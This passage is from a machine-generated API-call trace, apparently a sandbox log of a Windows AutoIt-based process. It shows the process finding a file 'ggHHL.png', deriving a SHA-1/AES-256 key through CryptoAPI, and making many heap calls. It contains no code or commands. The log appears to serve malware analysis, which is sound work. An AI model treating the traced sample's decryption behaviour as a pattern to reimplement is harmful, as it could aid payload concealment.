dwReserved1=0x8a7560, cFileName="ggHHL.png", cAlternateFileName="")) returned 0x90af58 [0188.604] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.604] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.604] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.604] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.604] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.604] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.604] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0188.605] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.605] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.605] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.605] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.605] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.605] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.605] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0188.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.605] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0188.606] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.606] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.606] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.606] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.606] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.606] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.607] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.607] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.610] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.610] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.610] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.610] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.610] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.611] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.611] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.611] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.611] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.611] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.611] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.611] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.611] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.611] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.611] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.611] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.611] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0188.611] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.611] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0188.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.612] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0188.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.612] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.612] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.612] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.612] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0188.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0188.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.612] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.613] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.613] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.613] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.613] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0188.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0188.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.614] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0188.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.614] CryptDestroyHash (hHash=0x90ae18) returned 1 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0188.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.616] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0188.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0188.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 